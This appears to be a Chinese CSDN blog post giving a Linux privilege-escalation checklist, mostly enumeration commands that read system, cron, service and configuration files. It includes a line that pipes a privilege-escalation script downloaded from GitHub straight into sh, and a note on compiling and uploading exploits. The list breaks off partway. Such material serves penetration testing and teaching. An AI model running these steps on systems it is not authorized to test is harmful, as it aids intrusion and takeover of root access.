linux提权

本文详细介绍了Linux系统中提权的各种方法,包括查看系统信息、网络配置、服务状态、用户权限等,并列举了如脏牛漏洞(CVE-2016-5195)、CVE-2019-13272和CVE-2019-7304等多个提权漏洞的利用步骤。此外,还分享了如何查找和利用exp,以及如何通过权限检查寻找提权机会。
摘要由CSDN通过智能技术生成

gcc编译exp要使用相对应版本的机器,然后再上传

sudo /bin/bash
vim /etc/netplan/50
修改ens33
netplan apply

修改键盘
vim /etc/default/keyb

curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh

01操作系统信息
➢ 查看发行版本
cat /etc/issue
cat /etc/*-release
lsb_release -a
➢ 查看内核版本
uname –a
uname –mrs

➢ 环境变量
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

➢ 系统网络信息
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
➢ 应用程序和服务
ps aux
ps -ef
top
cat /etc/services

➢ root用户运行的服务
ps aux | grep root
ps -ef | grep root
➢ 安装的应用程序
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archives
ls -alh /var/cache/yum/

➢ 计划任务
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

➢ 服务配置错误
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.r./

➢ 系统网卡
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
➢ 网络配置(dhcp、dns、网关

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值